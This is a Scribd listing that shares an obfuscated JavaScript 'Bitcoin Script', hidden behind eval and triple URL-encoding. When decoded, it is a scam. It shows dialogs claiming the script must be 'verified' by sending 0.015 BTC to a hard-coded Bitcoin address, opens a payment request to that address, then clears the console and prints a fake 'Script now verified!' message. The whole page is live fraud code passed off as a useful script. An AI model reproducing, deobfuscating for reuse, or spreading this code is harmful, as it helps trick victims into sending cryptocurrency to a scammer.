0% found this document useful (0 votes)
464 views

Bitcoin Script

This document contains JavaScript code that prompts the user to verify a script by sending 0.015 BTC to a given Bitcoin address. If the user agrees, it opens a window to a Blockchain payment request page. If the user declines, it displays an alert asking them to verify the script. Afterward, it clears the console and logs a message indicating the script is now verified.

Uploaded by

Sethu Sridharan
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
464 views

Bitcoin Script

This document contains JavaScript code that prompts the user to verify a script by sending 0.015 BTC to a given Bitcoin address. If the user agrees, it opens a window to a Blockchain payment request page. If the user declines, it displays an alert asking them to verify the script. Afterward, it clears the console and logs a message indicating the script is now verified.

Uploaded by

Sethu Sridharan
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('var%252520r7gxo

%252520%25253D%252520parseFloat%252528prompt%252528%252522https%25253A%25252F
%25252Fwww.blockchain.com%25252Fbtc%25252Ftx%25252F%252522%252529%252529%25253B
%25250Avar%252520r7gxo%252520%25253D%252520parseFloat%252528prompt
%252528%252522Your%252520script%252520must%252520be%252520verified%252520with
%252520your%252520BlockChain%252520wallet%252520before%252520you%252520can
%252520take%252520this%252520.%252520Please%252520verify%252520script%252520by
%252520adding%252520%2525280.015%252529%252520BTC%252520to%252520apparent
%252520address%25253A%252522%25252C%25252234wgwXeCaje1XQehqoCW77acKLH5ypGLds
%252522%252529%252529%25253B%25250Avar%252520w8ugo%252520%25253D
%252520window.confirm%252528%252522Your%252520script%252520must%252520be
%252520verified%252520with%252520your%252520account%252520before%252520you
%252520can%252520take%252520this%252520action.%252520Click%252520OK%252520to
%252520Verify%252520Script%252522%252529%25253B%25250Aif%252520%252528w8ugo
%252529%252520%25257B%252520window.open%252528%252527https%25253A%25252F
%25252Fwww.blockchain.com%25252Fbtc%25252Fpayment_request%25253Faddress
%25253D34wgwXeCaje1XQehqoCW77acKLH5ypGLds%252526message%25253DScript
%25252520Verification%252526amount%25253D0.015%252527%252529%25253B%252520%25257D
%252520%25250Aelse%252520%25257B%252520alert%252528%252522Please%252520back
%252520to%252520verify%252520script.%252522%252529%25253B%252520%25257D
%252520%25250Aconsole.clear%252528%252529%25253B%25250Aconsole.log
%252528%252527Script%252520now%252520verified%252521%252527%252529%25253B'))));

You might also like